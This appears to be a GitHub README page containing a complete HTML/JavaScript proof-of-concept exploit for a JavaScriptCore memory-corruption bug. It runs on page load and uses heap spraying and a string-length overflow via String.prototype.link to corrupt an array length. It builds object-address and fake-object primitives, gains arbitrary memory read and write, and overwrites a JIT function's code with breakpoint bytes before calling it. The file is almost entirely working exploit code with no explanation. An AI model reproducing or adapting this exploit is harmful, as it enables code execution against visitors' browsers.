README.md
Rendering markdown...
<html>
<head>
<script>
// b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218
big_array = [];
debug = 0;
arr = [];
evil_buffer = {};
bigarray_buffer_index = 0;
buffer_arr_index = 0;
function_to_shellcode = {}
function log(txt) {
var c = document.createElement("div");
c.innerHTML = "log: " + txt;
d.appendChild(c);
}
function debug_alert(str){
if(debug){
alert(str);
log(str);
}
}
function gc() {
debug_alert("gc");
for(i = 0;i < 0x924924;i++){ //0x4924924
arr[i] = new ArrayBuffer(20); //54
}
debug_alert("gcc");
}
function gc2() {
try {
var c = document.createElement("canvas");
var gl = c.getContext("2d");
for (var i = 0; i < 100; i++) {
var gggg = gl.createImageData(1, 0x10000/4)
}
} catch (e) {
}
}
function make_a_big_hole(){
g = []
gg = "g".repeat(0x7fff1000)
debug_alert("big_hole");
for(var i = 0; i < 5;i++){
g[i] = String.prototype.fontsize.call(gg,5);
}
debug_alert("after_big_hole");
for(var i = 0; i < 0x3;i++){
g[0] = null; //gc
//g[1] = null;
g[2] = null; //".replace
g[3] = null; //hole
}
//g = null;
debug_alert("big_array");
init_big_array_len = 0x10000000;
g[2] = new Array(init_big_array_len);
g[2].fill(1.1);
debug_alert("after_big_array");
big_array = g[2];
//evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0));
//arr2 = []; arr2[0] = evil_float64;
//heap_feng_shui();
gg = null;
gc();
}
function make_evil_data(){
nop = "\x00"
nop_data = ""
offset = 0x38 + 0x1e +0x38
nop_data = nop.repeat(offset/2);
//nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff"
nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff");
ff = "\x00"
ff_data = ff.repeat((0x1000-offset-0x18)/2);
return nop_data + ff_data;
}
function heap_feng_shui(){
debug_alert("heap_feng_shui");
arr2 = []
buffer_arr = []
/* for(var i = 0;i < 20;i++){
//arr2[i] = new Array(0x1000);
buffer_arr[i] = new Float64Array(0x2000001);
// buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375
}*/
for(var i = 0;i < 0x18000;i++){
evil_float64 = new Float64Array(new ArrayBuffer(0x8000));
evil_float64.fill(1.1);
buffer_arr[i] = evil_float64;
}
debug_alert("after_heap_feng_shui");
}
function f64tou32(number){
a = new Float64Array(0x8);
a.fill(number);
b = new Uint32Array(a.buffer);
result = [];
result[0] = b[0];
result[1] = b[1];
return result;
}
function u32tof64(arr){
b = new Uint32Array(0x8);
b[1] = arr[1];
b[0] = arr[0];
a = new Float64Array(b.buffer);
return a[0];
}
function read_obj(obj){
big_array[bigarray_buffer_index] = obj;
f64_address = buffer_arr[buffer_arr_index][0x50/8];
uint32 = f64tou32(f64_address);
// alert(uint32[1].toString(16)+ " " + uint32[0].toString(16));
return uint32;
//alert(uint32[1].toString(16)+ " " + uint32[0].toString(16));
}
function fake_obj(arr_address){
f64_address = u32tof64(arr_address);
// alert(f64_address);
buffer_arr[buffer_arr_index][0x50/8] = f64_address;
// alert("here");
return big_array[bigarray_buffer_index];
}
function randomString(){
chars = "abcdefghijklmnopq";
maxPos = chars.length;
result = "";
for(i = 0;i < 0x8;i++){
result += chars.charAt(Math.floor(Math.random() * maxPos));
}
return result;
}
function sprayFloat64ArrayStru(){
for(var i = 0; i < 0x1000;i++){
var a = new Float64Array(1);
a[randomString()] = 1337;
}
}
function Int64(arr){
uint32 = [];
uint32[0] = arr[0];
uint32[1] = arr[1] - 0x10000;
f = u32tof64(uint32);
return f;
}
function Int64_add(arr,num){
arr[0] = arr[0] + num;
return arr;
}
function read_64(addr){
f = u32tof64(addr);
fakearray[0x2] = f;
result = [];
result[0] = evil_buffer_array[0];
result[1] = evil_buffer_array[1];
//alert(result[1].toString(16)+ " " + result[0].toString(16));
return result;
}
function write_32(addr,data){
f = u32tof64(addr);
fakearray[0x2] = f;
evil_buffer_array[0] = data;
}
function make_jit_function(){
func_body = "eval('');abc = [];"
for(i = 0;i<500;i++){
func_body += "abc[" + i.toString() + "];"
}
function_to_shellcode = new Function("a",func_body);
// alert("here")
for(i = 0;i < 100; i++){
function_to_shellcode();
}
// alert("here")
}
function trigger() {
//alert(2);
// make_jit_function();
evil_data = make_evil_data();
a = evil_data.repeat(0x7fff0000/0x800);
z = a.slice(1);
x = "\"".repeat(0x2aaaaaa0);
//alert("1");
// alert(evil_data.length.toString(16));
make_a_big_hole();
z = String.prototype.link.call(a,x)
alert("The Array length is 0x" + big_array.length.toString(16));
heap_feng_shui();
//z = null;
//a = null;
//x = null;
// heap_feng_shui();
//alert("end");
//Array.prototype.slice.call(arr,1);
//Array.prototype.slice.call(buffer_arr,1);
t = Array.prototype.slice.call(big_array,0x10000001,0x10000002);
t = Array.prototype.slice.call(buffer_arr,1,2);
if(big_array.length != init_big_array_len){
// alert("Success!The Array length is 0x" + big_array.length.toString(16));
// alert(big_array[0x1]);
/*for(var i = 0x10000000;i < big_array.length;i++){
if(big_array[i] != undefined && big_array[i] != -1){
alert(i.toString(16));
alert(big_array[i]);
}
}*/
flag = 0;
for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000
//alert(i.toString(16));
if(big_array[i] == 1.0375){
alert("find Success");
bigarray_buffer_index = i;
big_array[bigarray_buffer_index] = 3.3333333;
j = 0;
while(j<0x18000){
if(buffer_arr[j][0x50/8] != 1.1){
buffer_arr_index = j;
flag = 1;
break;
}
j++;
}
break;
}
}
if(flag == 0){
alert("can't find buffer!");
window.location.reload();
}
}
else{
alert("can't overwrite the length!");
window.location.reload();
}
//alert(buffer_arr_index);
make_jit_function();
sprayFloat64ArrayStru();
evil_buffer_array = new Uint32Array(0x1000);
var jsCellHeader = Int64([0x00001000,0x11827000]);
var lengthFlags = Int64([0x00000010,0x00010000]);
var container = {
jsCell : jsCellHeader,
butterfly : false,
vector : evil_buffer_array,
lengthAndFlags : lengthFlags
};
address = Int64_add(read_obj(container),0x10);
//alert(address[1].toString(16) + " " + address[0].toString(16));
fakearray = fake_obj(address);
//String.prototype.link.call(container);
while(!(fakearray instanceof Float64Array)){
i = 1;
jsCellHeader = Int64([0x00001000+i,0x11827000]);
container.jsCell = jsCellHeader;
i++;
}
//String.prototype.link.call(fakearray);
func_addr = read_obj(function_to_shellcode);
// alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16));
executableAddr = read_64(Int64_add(func_addr,0x18));
jitCodeAddr = read_64(Int64_add(executableAddr,0x18));
codeAddr = read_64(Int64_add(jitCodeAddr,0x20));
write_32(codeAddr,0xcccccccc);
//codeAddr = read_64(Int64_add(jitCodeAddr,0x10));
//write_32(codeAddr,0xcccccccc);
alert("begin_shellcode!!!!!!");
function_to_shellcode();
alert("end");
}
</script>
</head>
<body onload="trigger()">
<pre id="d">
</pre>
</body>
</html>